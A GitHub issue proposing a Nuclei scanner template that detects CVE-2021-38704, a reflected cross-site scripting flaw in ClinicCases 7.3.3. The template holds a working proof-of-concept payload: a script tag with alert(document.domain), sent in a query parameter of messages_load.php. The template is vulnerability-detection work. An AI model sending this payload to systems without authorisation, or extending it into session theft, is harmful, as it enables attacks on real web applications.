### ISSUE TITLE
CVE-2021-38704 - ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)

### ISSUE THREAD

**Issue by alph4byt3** [projectdiscovery/nuclei-templates#3052]
### Template Information:

CVE-2021-38704 - ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)

https://nvd.nist.gov/vuln/detail/CVE-2021-38704
https://github.com/sudonoodle/CVE-2021-38704

### Nuclei Template:

```yaml
id: CVE-2021-38704

info:
  name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)
  author: alph4byt3
  severity: medium
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38704
    - https://github.com/sudonoodle/CVE-2021-38704
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
